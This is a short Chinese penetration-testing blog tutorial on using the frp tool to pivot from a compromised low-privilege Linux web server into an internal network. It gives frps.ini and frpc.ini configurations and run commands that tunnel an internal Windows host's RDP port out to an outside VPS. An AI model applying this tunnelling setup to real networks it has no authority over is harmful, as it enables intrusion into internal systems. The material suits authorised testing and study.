• 欢迎访问挑战自我博客网站,安全研究,web渗透,推荐使用最新版火狐浏览器和Chrome浏览器访问本网站,欢迎加入挑战自我博客网站 网站主页

1、frp工具下载地址:

https://github.com/fatedier/frp/releases

总体功能非常强大,然后说明就觉着写的太复杂,看着费劲

2、测试说明

使用环境:
内网控制一台Linux的web服务器,权限较低,希望通过端口转发程序来突破控制内网其他的windows机器

Linux的WEB服务器 A : 192.168.1.97
内网windows服务器 B : 192.168.1.91 开放3389端口
公网VPS服务器C : 1.1.1.1

frp工具分为两类程序,一类是frps,这个主要是用在VPS上,用于监听端口的;另一类是frpc,这个主要是用在内网的Linux主机上,用于端口转发

在本例中,执行步骤如下:

1、在C服务器上,配置frps.ini,默认就可以了,监听7000端口

[common]
bind_port = 7000

执行如下命令:

frps.exe -c frps.ini

2、在A服务器上,配置frpc.ini,配置如下:

[common]
server_addr = 1.1.1.1
server_port = 7000

[ssh]
type = tcp
local_ip = 192.168.1.91
local_port = 3389
remote_port = 6000

注:上面的参数都比较明确,就是这个remote_port端口比较费解,实际测试发现,在与vps通信之后,vps将会开放6000端口

执行命令如下:

./frpc -c ./frpc.ini